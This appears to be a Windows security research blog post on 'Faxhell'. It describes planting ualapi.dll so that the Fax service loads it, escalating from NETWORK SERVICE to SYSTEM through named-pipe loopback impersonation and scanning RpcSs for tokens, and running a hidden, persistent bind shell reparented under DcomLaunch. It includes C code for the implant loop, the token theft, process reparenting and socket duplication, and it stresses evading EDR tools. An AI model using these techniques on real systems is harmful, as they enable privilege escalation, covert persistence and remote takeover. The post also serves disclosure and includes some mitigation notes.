new Guid(0xe46eead8, 0x0c54, 0x4489, 0x98, 0x98, 0x8f, 0xa7, 0x9d, 0x05, 0x9e, 0x0e);

And, sure enough, after launching the script:

sc query WerSvc
SERVICE_NAME: WerSvc
    TYPE               : 10  WIN32_OWN_PROCESS
    STATE              : 4  RUNNING
                            (STOPPABLE, PAUSABLE, IGNORES_SHUTDOWN)
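
If you’d rather stay in C than modify a PowerShell script, a minimal sketch of the same trick — register against the trigger’s provider GUID (the WerSvc one shown above) and fire any event — could look like this; it needs evntprov.h and a link against Advapi32, and error handling is mostly omitted:

GUID triggerProvider =
    { 0xe46eead8, 0x0c54, 0x4489,
      { 0x98, 0x98, 0x8f, 0xa7, 0x9d, 0x05, 0x9e, 0x0e } };
REGHANDLE regHandle;

//
// UBPM only cares that the provider lit up -- any event will do
//
if (EventRegister(&triggerProvider, NULL, NULL, &regHandle) == ERROR_SUCCESS)
{
    EventWriteString(regHandle, 0, 0, L"trigger");
    EventUnregister(regHandle);
}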

There are a few other interesting triggers too — and Microsoft documents the official ones here. For example, you’ll see that the IKEEXT service is spawned by Rasdial.exe due to a trigger on UDP port 500 (which you could fake in other ways than launching Rasdial.exe).

Abusing Fax

Going back to Process Monitor, when we ran the fax service, we noticed this: 

Fxssvc.exe was looking for c:\windows\system32\ualapi.dll — unsuccessfully. So we placed our DLL in that location, started the service and sure enough, it was loaded into the process! 

But then we had a few problems:

  1. The service doesn’t run under the SYSTEM account, but under NETWORK SERVICE. This isn’t a truly privileged account, so there’s more work to be done.
  2. The service looks up some exports using GetProcAddress, which it expects to find in Ualapi.dll
  3. Unless you’re actually queueing a fax, the service exits almost as soon as it starts (there are a lot of unfortunately named “suicide” variables in the symbols), meaning we can’t have persistent threads lying around.

We wanted to solve for 2 & 3 together — normally, malicious privilege escalation attacks leverage DllMain in order to perform their next steps, but in our case, the need to elevate to SYSTEM makes things harder — plus the fact we want to have an embedded bind shell developed in a smarter way. Secondly, encoding an entire payload in DllMain is highly suspicious to anyone disassembling the binary. And finally, DllMain is called when the DLL is loaded, which means that the loader lock is held, greatly diminishing our capabilities.

Therefore, we skirted the entire problem by not having an entrypoint in the DLL at all, and leveraging the way the Fax service calls the Ualapi.dll, which you can see in the IDA screenshot below:

Since the service expects all three functions present, we export all of them, and then implement a UalStart function where we write our logic — safely away from the confines of the loader lock. Normally we’d have done all of our operational setup here, but we wanted to be sneaky, and leverage the Windows Thread Pool, which affords us some asynchronicity, makes call stacks harder to understand, and brings pain to EDR tools.

The main body of our UalStart is actually quite simple:


PTP_POOL pool;
PTP_CLEANUP_GROUP cleanupGroup;
PTP_WORK work;
TP_CALLBACK_ENVIRON CallBackEnviron;

//
// Create the thread pool that we'll use for the work
//
pool = CreateThreadpool(NULL);
if (pool == NULL)
{
    goto Failure;
}


//
// Create the cleanup group for it
//
cleanupGroup = CreateThreadpoolCleanupGroup();
if (cleanupGroup == NULL)
{
    goto Failure;
}

//
// Configure the pool
//
InitializeThreadpoolEnvironment(&CallBackEnviron);
SetThreadpoolCallbackPool(&CallBackEnviron, pool);
SetThreadpoolCallbackCleanupGroup(&CallBackEnviron, cleanupGroup, NULL);

//
// For now, always stay in this loop
//
while (1)
{
    //
    // Create the work item whose callback will take care of the actual payload
    //
    work = CreateThreadpoolWork(WorkCallback, NULL, &CallBackEnviron);
    if (work == NULL)
    {
        goto Failure;
    }

    //
    // Send the work and wait for it to complete
    //
    SubmitThreadpoolWork(work);
    WaitForThreadpoolWorkCallbacks(work, FALSE);

    //
    // We're done with this work
    //
    CloseThreadpoolWork(work);
}

It not only provides the benefits of the thread pool evasion/abstraction, but also means that UalStart will never return — keeping the Fax service from shutting down, and additionally putting it in a perpetual SERVICE_START_PENDING state, which is unstoppable through regular Sc.exe commands. We now have a persistent implant on the system — but we still want to get to a SYSTEM shell.

An Elevated Fax

Now that we have our NETWORK SERVICE implant, it’s time to head on over to SYSTEM. When this account was first introduced in Windows XP, alongside its brethren LOCAL SERVICE, the idea was to have service accounts with reduced privileges and permissions, most especially ones that would not belong to the Administrators group.

However, since these are services, they were given the SeImpersonatePrivilege, which means they can impersonate a more powerful token as long as someone more privileged connects and/or speaks to them, through Winsock, Named Pipes, or ALPC. Technically, this privilege can be dropped from a given Svchost.exe by using the RequiredPrivileges registry value, but few services do so, and as you can see below, Fax does not (in fact, it even has the SeAssignPrimaryTokenPrivilege too):


Therefore, our initial idea was to open a handle to the RpcSs service, which holds handles to lots of different tokens, including SYSTEM tokens:

The Fax service, which runs in Fxssvc.exe, has the impersonation privilege, and therefore we should be able to duplicate one of these tokens and impersonate it, elevating ourselves to SYSTEM. Unfortunately, unless you’re running Windows XP (i.e.: reading this blog during a BlackHat Advanced Windows Exploitation Course), this simply won’t work.

This is due to the fact that since Windows Vista, services have been hardened, as described in the Windows Internals books as well as in this excellent blog by James Forshaw. That being said, over the years, as was shown countless times, the “isolation” between the services did not truly mean much. Multiple attacks were shown, which we’ll enumerate and reference here, alongside their mitigations:

  • Simply spoofing an endpoint supposedly owned by another service, and getting a SYSTEM process to connect, then impersonating it
  • Finding another service that shares the same Svchost.exe instance, and simply using its own SYSTEM-level impersonation tokens, since the handle table is shared
    • Windows 10 Redstone 2 now isolates services in their own separate Svchost.exe instances, on systems with over 3.5GB of RAM
  • Opening a handle to another Svchost.exe instance which has SYSTEM-level impersonation tokens, and duplicating them
    • In Windows Vista, each NETWORK SERVICE process has its own Logon ID (LUID), and the process object is ACL’ed such that only SYSTEM and the unique per-service Logon ID have access to it
  • Opening a handle to a thread in another Svchost.exe instance and sending an APC to duplicate a SYSTEM-level impersonation token
    • In Windows Vista, the thread objects are all owned by NETWORK SERVICE, but use an OWNER RIGHTS ACE, also introduced in Vista, in order to strip out any privileged permissions.
  • Leveraging loopback network authentication attacks to coerce a more privileged service from authenticating over NTLM with its SYSTEM token
  • Abusing the fact that the DOS Device Map is shared among all NETWORK SERVICE services, and performing a DLL path resolution attack
    • No mitigation
  • Leveraging loopback named pipe authentication attacks to trick LSASS into returning a more privileged NETWORK SERVICE token
    • No mitigation, and the approach we chose. As always, James wrote another blog post describing this technique.

The idea is simple — while we can’t directly open a handle to RpcSs, we can create a named pipe, then open it back using the \\localhost SMB namespace (instead of \\.), and then impersonate it. This will cause the SMB driver to call AcquireCredentialsHandle to obtain a NETWORK SERVICE token (our current account), which it does by passing in the LUID. In turn, LSASS returns the original token that was created to represent the logon session as a whole — which just so happens to be the RpcSs token, since this is normally the first service running as NETWORK SERVICE. In other words, we just got the same LUID as RpcSs, and we can now open a handle to it!
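
For reference, a minimal single-threaded sketch of this trick looks roughly like the following. The pipe name is entirely arbitrary, and all error handling (including the expected ERROR_PIPE_CONNECTED case on ConnectNamedPipe) is omitted:

HANDLE hServer, hClient;
CHAR ping;
DWORD bytes;

//
// Create a pipe server endpoint under a name of our choosing
//
hServer = CreateNamedPipeW(L"\\\\.\\pipe\\notafax", PIPE_ACCESS_DUPLEX,
                           PIPE_TYPE_BYTE | PIPE_WAIT, 1, 0, 0, 0, NULL);

//
// Open it back through the SMB loopback path, which makes the redirector
// authenticate with our NETWORK SERVICE logon session (LUID) -- LSASS hands
// back the token of the session's original owner, i.e. RpcSs
//
hClient = CreateFileW(L"\\\\localhost\\pipe\\notafax", GENERIC_READ | GENERIC_WRITE,
                      0, NULL, OPEN_EXISTING, 0, NULL);
ConnectNamedPipe(hServer, NULL);

//
// Impersonation requires the server to have read data from the client first
//
WriteFile(hClient, "!", 1, &bytes, NULL);
ReadFile(hServer, &ping, 1, &bytes, NULL);
ImpersonateNamedPipeClient(hServer);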

Here’s a screenshot of our worker thread’s token after impersonating the named pipe. Notice how many more privileges it has, and the new LogonSession group it joined: 

 

A SYSTEM Fax

Because we now have the same token as RpcSs, we can freely open a handle to it, with access all the way up to PROCESS_ALL_ACCESS. We then implemented a handle scanning algorithm similar to previous ones demonstrated, but with a few twists that take advantage of more modern Windows functionality:

  1. We use the ProcessHandleInformation class of NtQueryInformationProcess to enumerate the process handles. Previous research and PoCs brute-forced each possible handle, which is a much slower approach. A few other sources used the SystemHandleInformation class of NtQuerySystemInformation, which is slower because it enumerates all handles – requiring filtering to find the right process.
  2. We open our own token, then use NtQueryObject’s ObjectTypeInformation class to get the Object Type Index for Token Objects (which can vary from version to version, depending on initialization order). This allows us to filter the result list in #1 quickly without calling DuplicateHandle and then DuplicateToken on every handle, like past sources, nor do we need to do a name comparison on the Type Name.
  3. Now that we know we are dealing with a token handle, we also check the DesiredAccess field to select only tokens where the granted access mask is TOKEN_ALL_ACCESS. This increases the chance that we find highly privileged interesting tokens that we can then impersonate.
  4. On most systems, it then only takes us 2-3 calls to DuplicateHandle before we find an appropriate SYSTEM token.

What do we consider an “appropriate” token, by the way? First, we check the AuthenticationId (LUID) to ensure it is 0x3E7 (SYSTEM_LUID). Next, we check the PrivilegeCount to make sure it is equal to or above 22, which is the normal amount of privileges that a Windows 10 SYSTEM token has – some services run with filtered tokens, so RpcSs may impersonate such reduced SYSTEM tokens from time to time. We wanted the real deal. Thankfully, both of these checks can be quickly done with the TokenStatistics class of GetTokenInformation.
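
As a rough sketch, those two checks boil down to something like this (the helper name is ours, not from the actual PoC):

BOOL IsFullSystemToken(HANDLE hToken)
{
    TOKEN_STATISTICS stats;
    DWORD returnedLength;
    LUID systemLuid = SYSTEM_LUID;

    if (!GetTokenInformation(hToken, TokenStatistics,
                             &stats, sizeof(stats), &returnedLength))
    {
        return FALSE;
    }

    //
    // Must belong to the SYSTEM logon session (LUID 0x3E7)...
    //
    if ((stats.AuthenticationId.LowPart != systemLuid.LowPart) ||
        (stats.AuthenticationId.HighPart != systemLuid.HighPart))
    {
        return FALSE;
    }

    //
    // ... and carry the full complement of privileges, not a filtered subset
    //
    return stats.PrivilegeCount >= 22;
}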

Finally, after calling SetThreadToken, our thread now runs with a SYSTEM token that has all privileges present and enabled:


Armed with this token, we open a handle to yet another service: DcomLaunch. Once the handle’s been opened, we revert the token back to the original NETWORK SERVICE. The short duration of our impersonation, and the fact we merely open a handle and nothing else, helps keep us low on EDR tools’ visibility.
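
In code terms, this step is roughly just the following — hSystemToken is the token found by the scan above, dcomLaunchPid is assumed to have been located already, and reverting via RevertToSelf is a simplification of what our code does:

//
// While impersonating SYSTEM, grab the handle we'll need later for
// reparenting and socket duplication, then drop the SYSTEM token again
//
SetThreadToken(NULL, hSystemToken);
hDcomLaunch = OpenProcess(PROCESS_CREATE_PROCESS | PROCESS_DUP_HANDLE,
                          FALSE, dcomLaunchPid);
RevertToSelf();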

So – why DcomLaunch? We had two additional operational goals that we wanted to play with. First, we wanted to launch the perennial shell, but without having a SYSTEM-token’ed Cmd.exe underneath the… Fax service, sticking out like a sore thumb.

Additionally, we wanted to avoid having to use SeAssignPrimaryTokenPrivilege and doing the obvious “impersonate a SYSTEM token and set it as a primary process token”, so that we could use the sneakier PROCESS_CREATE_PROCESS technique. In case this doesn’t ring a bell, it essentially relies on the Windows behavior of automatically launching child processes with the token of their parent and combines it with the Windows Vista feature of allowing “re-parenting”. The link above has James’s (again!) original presentation on this, which he also describes on a blog post (and related functionality in his PowerShell tools).

This capability means that all Unix-like fork behavior (environment variable inheritance, handle inheritance, standard input/out inheritance, and the token duplication) will be based on the chosen parent process, and not the actual creator process. It also evades many EDR solutions that automatically assume the parent is the creator, and ultimately will make it such that Cmd.exe will appear in the process tree of the Svchost.exe that hosts DcomLaunch.

Why did we pick this service? Well… just take a look at what its process tree normally looks like:


Would you notice another Cmd.exe window in all this mess? 

Binding to a Socket

For an interactive local attacker, a SYSTEM Cmd.exe is great for privilege escalation, but a persistent backdoor that allows remote access is a lot more versatile (and a local attacker could bind to it as well).

In the real world, these types of shells are usually set up as “reverse shells” in order to avoid firewall rules around inbound connections. But we didn’t want to fully weaponize the entire chain and create a beaconing & C2 infrastructure, so we wrote a simple bind shell instead.

While this isn’t novel, we did want to use some Windows Internals knowledge to spice it up a little. First, we continued with our approach of leveraging the Windows Thread Pool API, and used the AcceptEx function which has a very different approach to establishing a Winsock connection vs. the usual BSD Socket API:

  • Instead of creating and returning a client-side socket after a connection is made, AcceptEx expects the caller to have already created the (unbound) socket and pass it in as an input
  • Instead of blocking, it pushes a completion packet to an I/O completion port (“overlapped I/O” in Win32 parlance), which can then be associated with a callback function using the Thread Pool API.
  • It does not consider the connection accepted (and thus does not wake up the I/O completion port) until at least one packet has been sent by the client – and it returns back what the first client packet’s data payload was.
  • It automatically fills out the local and remote SOCKADDR structures that represent the server and client IP and Port tuple
  • It’s not directly exported by the Winsock library (Ws2_32.dll) because it is a specialized Microsoft Extension. Instead, you must use WSAIoctl with SIO_GET_EXTENSION_FUNCTION_POINTER to look it up by GUID (this isn’t even documented on WSAIoctl’s documentation as a valid command!)
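
That last lookup-by-GUID dance is less odd than it sounds — a minimal sketch, assuming listenSocket already exists and mswsock.h is included:

LPFN_ACCEPTEX acceptEx = NULL;
GUID acceptExGuid = WSAID_ACCEPTEX;
DWORD bytesReturned;

//
// Ask the provider behind our listening socket for its AcceptEx pointer
//
WSAIoctl(listenSocket, SIO_GET_EXTENSION_FUNCTION_POINTER,
         &acceptExGuid, sizeof(acceptExGuid),
         &acceptEx, sizeof(acceptEx),
         &bytesReturned, NULL, NULL);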

As you can see, AcceptEx is quite strange – but also quite useful for what we were going for. Therefore, the last step our Thread Pool Work Callback will do is create two sockets – a listening socket and an unbound socket, bind the listening socket, and pass both as input to AcceptEx after looking up its pointer. Looking up the local IP address and building the SOCKADDR for bind is done using GetAddrInfoW (vs. gethostbyname), a more modern and easier to use API, and the sockets are created with WSASocket instead of socket – you’ll see why soon.

Finally, we pump an I/O completion into the thread pool and then wait for our callback to complete. Now UalStart is waiting on the work callback to return, and the work callback is waiting on the I/O callback to return. Thread stacks in Process Hacker won’t immediately show anything nefarious going on (such as someone blocked on accept from within a DLL), and our operations are spread out over 3 different threads (none of which we directly created).

Creating the SYSTEM Bind Shell

Eventually, a client connects to our remote endpoint and sends a packet. At this point, our I/O callback will execute. The reason we wanted this “send a packet” behavior is to avoid spuriously waking up due to someone doing port scanning and randomly trying to connect to our port. With AcceptEx, actual data must first be sent. This, in turn, also gives us the opportunity to validate that the input packet contains the right (expected) connection payload, which in our case is the string let me in\n – this made it easier to play with Netcat to test our shell out.

Once we validated the input payload, we can print out the local and remote endpoints with GetNameInfoW, another modern API that makes SOCKADDR translation to a string easy. But our real goal is to spawn that Cmd.exe attached to the accepted socket, reparented under DcomLaunch. The simple way of achieving this is as follows:

  • Use STARTF_USESHOWWINDOW to indicate that dwFlags will have window flags, and use SW_HIDE to keep the window hidden. Also pass in CREATE_NO_WINDOW to make extra sure.
  • Use STARTF_USESTDHANDLES to indicate that hStdInput, hStdOutput, and hStdError will have valid handle values, and use the accepted socket handle to allow the other side to drive the shell.
  • And, as before, use EXTENDED_STARTUPINFO_PRESENT to set the lpAttributeList which contains the PROC_THREAD_ATTRIBUTE_PARENT_PROCESS that has a handle back to DcomLaunch.
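
To make those three bullets concrete, here is a hedged sketch of that CreateProcess call. hDcomLaunch and shellStdHandle are placeholders for values we obtain elsewhere, and, as explained next, exactly which handle value goes into the STARTUPINFO matters a lot:

STARTUPINFOEXW startupInfo = { 0 };
PROCESS_INFORMATION processInfo;
SIZE_T attributeSize = 0;

//
// Build an attribute list holding a single attribute: the new parent
//
InitializeProcThreadAttributeList(NULL, 1, 0, &attributeSize);
startupInfo.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)
    HeapAlloc(GetProcessHeap(), 0, attributeSize);
InitializeProcThreadAttributeList(startupInfo.lpAttributeList, 1, 0, &attributeSize);
UpdateProcThreadAttribute(startupInfo.lpAttributeList, 0,
                          PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                          &hDcomLaunch, sizeof(hDcomLaunch), NULL, NULL);

//
// Hidden window, socket as the standard handles, reparented under DcomLaunch
//
startupInfo.StartupInfo.cb = sizeof(startupInfo);
startupInfo.StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
startupInfo.StartupInfo.wShowWindow = SW_HIDE;
startupInfo.StartupInfo.hStdInput = shellStdHandle;
startupInfo.StartupInfo.hStdOutput = shellStdHandle;
startupInfo.StartupInfo.hStdError = shellStdHandle;

CreateProcessW(L"C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, TRUE,
               CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT,
               NULL, NULL, &startupInfo.StartupInfo, &processInfo);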

And when it works (it doesn’t yet), the result should look something like this (do you even notice the Cmd.exe?)


However, such a shell will instantly exit. Recall that when reparenting, all fork like behaviors, including handle inheritance, will come from the parent, not the creator. And the handles we’ve passed in as STDIN and others must be inheritable, and must exist… in the parent.

Therefore, we must first make sure that the socket handles are inheritable, which is thankfully the default when using WSASocket (there is a flag, WSA_FLAG_NO_HANDLE_INHERIT, to disable this functionality). But, more importantly, we must make sure that the socket exists in DcomLaunch – not in Fax.

Unfortunately, if you search the Internet on how to duplicate a socket, you’ll find the WSADuplicateSocket API. This API isn’t “hands-free” – the receiving side must actively call socket again, and pass in a data structure that was returned (and somehow copied) by the sending side. Now we’d have to inject code into DcomLaunch and perform other highly suspicious actions.

Hold on – if sockets are supposed to be inheritable by default, such that they can be used as input/output handles for a new process, doesn’t this mean that the kernel (which handles process creation) can somehow duplicate the socket (inheritance is just another form of duplication) through the object manager, without specialized Winsock APIs? In fact, if you try using DuplicateHandle yourself on a socket, you’ll see that it works just fine, despite repeated warnings from MSDN and other sources.

That’s not to say those warnings or documentation are wrong. Yes, in certain cases, if you have various Layered Service Providers (LSPs) installed, or use esoteric non TCP/IP sockets that are mostly implemented in user-space, the duplicated socket will be completely unusable.

Ultimately, for sockets owned by Afd.sys, which is the kernel IFS (Installable File System) implementation of Windows Sockets, the operation works just fine, and the resulting socket is perfectly usable – and has certain perks. Therefore, we must set hStdInput to the socket’s handle index in DcomLaunch, after we’ve duplicated it (thankfully, DuplicateHandle tells us what the resulting handle index is).

Recall that one of the advantages of AcceptEx is that it expects the accepted socket handle as input, unlike accept that returns it after the connection is made. This benefit means that we can actually open a handle to DcomLaunch while we impersonate SYSTEM, create the local accept socket, and then immediately duplicate it.
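
Roughly, that duplication step is just this (again, the variable names are ours):

HANDLE remoteSocketHandle;

//
// The SOCKET is really an AFD file handle, so the object manager can
// duplicate it into DcomLaunch like any other handle; the resulting value
// is the handle index *inside* DcomLaunch, which is what the child inherits
//
DuplicateHandle(GetCurrentProcess(),
                (HANDLE)acceptSocket,
                hDcomLaunch,
                &remoteSocketHandle,
                0,
                TRUE,
                DUPLICATE_SAME_ACCESS);

That remoteSocketHandle value is what should end up as the standard handles in the CreateProcess sketch shown earlier.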

Merely duplicating an unbound socket doesn’t notify any firewall/WFP/EDR callback, and isn’t shown as being attached to anything (as is the case), and it also means that when our I/O callback function executes, we can actually immediately close our side of the accept socket, since the underlying AFD Endpoint is now being referenced by DcomLaunch too.

In our implementation, however, we chose to leave the socket alive until after we launch Cmd.exe, so that we could return error messages back to the client if needed.

Going back to our CreateProcess call, there’s just one last step before we can use the duplicated socket. If you read various Internet sources on how to bind the shell to a socket, you’ll see that the technique works fine when creating reverse shells, but not so much with bind shells (at least, according to Stack Overflow).

PoCs online and various forums suggest that the only way of achieving the intended result is to first create a series of named pipes, have threads pumping all the network I/O through the pipe, and then set the pipes as STDIN/OUT for the child process. Wow, that’s a lot of work, and we’re lazy.

Well, upon further reading, it turns out that the real problem is this: standard terminal handles are meant to be fully synchronous (“non-overlapped”), and socket creates overlapped (“non-blocking”) socket handles. The solution is to then use setsockopt to bring them back to “blocking” mode – or, to leverage the simple fact that WSASocket does not have this behavior, unless WSA_FLAG_OVERLAPPED is passed in, which is not the default, but which our code was using.

You see, what’s tricky is that AcceptEx itself is an Overlapped I/O API – that’s why it works with our entire thread pool based approach. So not passing in WSA_FLAG_OVERLAPPED means that we can no longer use the API, or a thread pool, or the entire approach we’re going for. That said, once again, the benefit of AcceptEx separately accepting the other socket (the one that will be bound to the client, and duplicated into DcomLaunch to serve as the STDIN/OUT handle) as input is a life saver. We can create the listening socket as overlapped, and then create the accepting socket as non-overlapped, having our cake and eating it too.
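
In other words, the two sockets end up being created with different flags — a quick sketch:

//
// The listening socket must be overlapped so AcceptEx and the thread pool
// I/O completion work...
//
SOCKET listenSocket = WSASocketW(AF_INET, SOCK_STREAM, IPPROTO_TCP,
                                 NULL, 0, WSA_FLAG_OVERLAPPED);

//
// ...while the accept socket is non-overlapped (and inheritable by default),
// so it can later serve as STDIN/STDOUT/STDERR for Cmd.exe
//
SOCKET acceptSocket = WSASocketW(AF_INET, SOCK_STREAM, IPPROTO_TCP,
                                 NULL, 0, 0);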

At last, we now combine everything together and have a functional CreateProcess call which creates a hidden Cmd.exe that’s bound to the client socket, and the client can start manipulating our remote machine. Now seems like about the right time to dump a demo screenshot to get that conference applause.

But, this blog post isn’t quite 6000 words yet, so we’re not done with the Windows internals, as there’s a few extra tidbits.

Duplicated Sockets and Evasion

First, if you use Netstat with the “-b” flag, or Process Hacker, or Process Monitor, you’ll not see a single socket inside of DcomLaunch. Indeed, the entire connection still appears as if driven by Fxssvc.exe. Even better, if we’d allow the Fax service to exit (which we didn’t want in our implementation), Netstat will show System, and Process Monitor seems to completely hide the network I/O. Additionally, any BFE or WFP-based tools will see traffic as if coming from Fxssvc.exe, and Windows Firewall rules will apply to that process, and not DcomLaunch. Look at this screenshot below, of our Netcat connection above:


This behavior is due to a glaring oversight in allowing DuplicateHandle on sockets but not fully making Afd.sys capable of correctly handling the security implications. Ultimately, because the AFD Endpoint is the same, the duplicate handle is just an additional reference – and all ownership of the socket still belongs to the original creator – even when the creator exits (and actually, because Netio.sys is still referencing the original EPROCESS, the creator and the PID become “zombies” and leak resources).

Here’s Windbg showing Fxssvc.exe and its reference count while it’s running:


And here it is after terminating the process — notice how there’s still 8 leaking references:


This behavior was actually discovered and told to us by a good friend – the creator of Process Hacker. It was submitted to Microsoft years ago, but – stop us if you’ve heard this one before – it’s not a security boundary, it’s by design. Certainly, a design which all EDR/Firewall/DFIR vendors all know about, since it’s so clearly documented, right?

The last internals behavior we use is in how we send data back to the client in error situations (a lot can go wrong with creating our Cmd.exe) – we don’t use the send API. Instead, we use yet another “lookup-by-GUID” functionality of Winsock 2.2, which is TransmitPackets. This is a more generic version of TransmitFile, an API that once got Microsoft in trouble, for building end-to-end file transfer directly into the kernel, which was once considered anticompetitive and dangerous (these days, Linux has exactly the same functionality).

TransmitPackets allows you to specify a set of virtual addresses — or file handles — and has a dozen flags to fine tune how this data should be sent – including through worker threads (the default) or through Kernel APCs (the faster way). We thought it’d be fun to use it, which again makes the payload import less obvious socket APIs, makes analysis a bit harder, and has a minute performance gain in the off chance there’s an error packet to send. It also avoids LSPs or other EDR hooks on traditional APIs like accept, recv, send, socket — and even the IOCTLs sent to Afd.sys are different.

Putting this all together, we now have our I/O callback calling WaitForSingleObject to wait for the Cmd.exe to exit when the client disconnects. We’re good citizens and use the CallbackMayRunLong thread pool API so as not to hold things up — note that we could have used the WaitCallback functionality of the thread pool to be asynchronously notified when the shell exits, but that would’ve added more complexity that at this point just wasn’t worth it.

Once the Cmd.exe terminates, the I/O callback completes, which then wakes up the work callback, which then wakes up the UalStart thread. In our code, it goes back into a loop, and starts the whole operation again. Certainly, we could’ve cached a bunch of data to make this easier, but we opted for the simpler approach. And you could also make it so that Fxssvc.exe exits and this whole loop logic is hosted somewhere else, etc., etc., etc. We’re not actually NSA operators, so we’ll leave that to the real implant writers.

A last note on this: if you like using this unknown DLL but, unlike us, don’t mind restarting the machine, you can always restart and let Spoolsv.exe load Ualapi.dll when it starts running. This process starts on boot and runs as SYSTEM, which saves us a lot of work — in that case we just need to open our bind shell:


Of course, most people do notice when their computer restarts out of nowhere. And if you plan on waiting for the machine to restart for an unrelated reason (update, crash, etc.) you might be waiting a very long time, as many servers only go down a few times a year for a scheduled update and neither of us can remember the last time we restarted our computers. But hey, maybe you’re playing the long game. We don’t judge. Much.

ATP Bonus Round

This was a lot of reading and effort for a simple DLL hijacking attack. Maybe you just want something a lot simpler, and don’t want to worry about custom exports and a funnily-named DLL. Well, Windows 10 provides exactly what you need, and takes you straight to SYSTEM without any of this work. How could something like this work? Well, you’ve probably heard of Windows Defender ATP. What you might not know is that “ATP” stands for “Accommodating To Planting”.

In fact, every single DLL that it loads suffers from a load ordering issue, where the current directory takes precedence over System32. But that’s OK — this is clearly a 3rd party tool, not from a security-focused team, and understanding the internals of load ordering is hard, so we can be understanding:


Of course, things aren’t as easy as they might seem at first, as ATP does have a number of mitigations in place to avoid nonchalant abuse of this behavior:

  • The Service Control Manager (SCM) will start it as a Windows Protected Process Light (PPL) which will require your DLL to be Microsoft-signed (or some PPL/signature bypass, like the ones shown at Recon 2019 by James Forshaw and Alex).
  • Mssecflt.sys / Sgrmagent.sys have capabilities to detect this type of attack, in combination with Windows Defender and System Guard Runtime Monitor Attestations (Octagon).

That being said, using the PreferSystem32Images mitigation would certainly clean up this behavior.
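For reference, a process can opt into that mitigation for itself with a single call early at startup; a minimal sketch, assuming all you want is for DLL searches to resolve System32 before the application or current directory:

#include <windows.h>

BOOL
EnablePreferSystem32Images (
    VOID
    )
{
    PROCESS_MITIGATION_IMAGE_LOAD_POLICY imageLoadPolicy = { 0 };

    //
    // Ask the loader to check System32 first when resolving DLL loads for
    // this process, defeating current-directory planting like the one above.
    //
    imageLoadPolicy.PreferSystem32Images = 1;
    return SetProcessMitigationPolicy(ProcessImageLoadPolicy,
                                      &imageLoadPolicy,
                                      sizeof(imageLoadPolicy));
}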

Windows Manganese (21H1) Post-Credits Scene

OK, OK, let’s stop making fun of the OS Vendor’s EDR tool. The team was acquired, not native to Microsoft, and DLL hijacking isn’t even a security boundary. It’s not like the OS itself would ever have issues like these… right? Right??? Continuing in the tradition of ever-increasing quality and static analysis tools and totally-not-throwing-the-SDL-out-the-Window, the next version of Windows 10 just adds a built-in DLL planting vector to every privileged process — EdgeGdi.dll. The latest builds now hard-code a load of this DLL directly inside Gdi32.dll — a fact which we noticed alongside @decoder_it on Twitter:


Yep — a new function CheckIsEdgeGdiProcessOnce was added — which makes every GUI process now vulnerable to this DLL planting attack. Ah, security… why even bother?

Show Me The Code!

We’ve implemented the end-to-end functionality described here in our GitHub project Faxhell, which is a pun on the pronunciation of the word “Fax” (“Facs”) and “Shell”, while also spelling out the words “Fax Hell”. Because Alex likes naming things in silly ways.

Read our other blog posts:

Symbolic Hooks Part 4: The App Container Traverse-ty

After getting the driver in Part 3 of our blog to load and adding a DbgPrintEx statement in our hook, we managed to get all the paths that were being opened without crashing the machine. We got really excited thinking we were done. But as soon as we clicked on the Start Menu, we noticed things had gone awry – it wasn’t starting up at all, and when we launched Process Monitor from SysInternals, we could see ShellExperienceHost.exe crashing. We tried other applications, which ran fine but still, the machine was pretty much unusable. So, we relaunched our IDA and WinDbg and went hunting for more bugs.

Continue reading “Symbolic Hooks Part 4: The App Container Traverse-ty”

Symbolic Hooks Part 3: The Remainder Theorem

We ended the second part with, unsurprisingly, a bugcheck. We tried to redirect all access to the C: volume to our device in order to get information about all the paths that are being accessed, but the first time anyone tried opening the C: volume itself, the I/O manager threw a DRIVER_RETURNED_STATUS_REPARSE_FOR_VOLUME_OPEN blue screen at us.

Unfortunately, we can’t return any other status code than STATUS_REPARSE or the path will not be parsed properly and a lot of things will break in the system as our fake device now becomes the “file system” of this poor path. But what if we could find a way to never have to return STATUS_REPARSE for volume opens, because we never see a volume open to begin with?

Continue reading “Symbolic Hooks Part 3: The Remainder Theorem”